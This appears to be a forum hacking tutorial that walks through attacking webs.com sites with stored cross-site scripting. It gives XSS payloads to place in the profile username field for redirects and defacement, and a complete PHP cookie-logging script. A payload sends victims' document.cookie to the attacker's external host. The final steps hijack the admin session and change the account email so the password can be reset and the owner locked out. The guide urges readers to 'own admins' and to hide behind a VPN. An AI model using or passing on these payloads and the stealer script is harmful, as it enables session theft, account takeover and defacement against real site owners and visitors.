Hacking Any .webs.com website with Cross Site Scripting! (XSS)

Things Need While Preforming this attack:
• A VPN! Safety First!
• Knowledge of Cross Site Scripting
•A active .webs.com website

Step 1.
Sign up on your webs.com target website and make any username.

Step 2.
Go to "Edit Profile" or anywhere so you can change your name.

The name changing place should look like this:


Step 3.
Change your username to <script>alert("XSS")</script>

Once you've done that visit your profile. When you do you'll see a prompt that pops up and it should say "XSS" depending on what you put in the script.

Step 4.
If you'd like to deface, You will type in <script>window.location="http://LinkToYourDefaceHere.com/"</script>

Once you've saved that, refresh your profile. You should be redirected to your deface website/page.
To upload your deface just go to http://www.pastehtml.com/ and paste your deface source code there. Then where it says "LinkToYourDefaceHere" you'll put your pastehtml link.

Hacking the Admin's account!

Things Need While Preforming this attack:
• A Cookie Stealing Script
• Knowledge of Cross Site Scripting
•A retarded admin.

Step 1.
Go to http://www.000webhost.com/ and make a website or something.

Step 2.
Create 1 file in your websites file manager. Make sure it is a .php file.
The name can be whatever you'd like. For this example we'll put "Bella.php"

Step 3.
Now, inside of Bella.php you need to put the following code:

Quote: <?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>

Step 4.
Now, go to "www.yoursite.com/Bella.php". You should get a blank page.
If not, it's whatever.
Then you need to go back into your file manager.
If you see "log.txt" the cookie stealing operation worked!
Just go ahead and delete the "log.txt".

Step 5.
Go to your targets website and change your username to:
<script>location.href = 'http://www.yoursite.com/Bella.php?cookie='+document.cookie;</script>

Step 6.
Send your profile link to the admin of the site.
Once he clicked on it check your File Manager...

You should have a log.txt file.. Inside of it is the admins cookie!!
I don't want to explain it, but look up a tutorial on google on how to switch cookies..

Step 7.
Once you've switched out the cookies you refresh the page and you should be logged into the admin account!

Have fun owning admins!

This isn't only for the admin account.. It's for anyone who clicks on your profile!
Also, you can't change the Admin's password because you need there password in order to do so..

so, go to the place where you change your username. Then click on "Edit Account"
Change the email to YOUR email..
Then sign out and try to re-sign in.. Then click forgot password.
Then you reset the password and you'll have access to the account and the Admin won't!!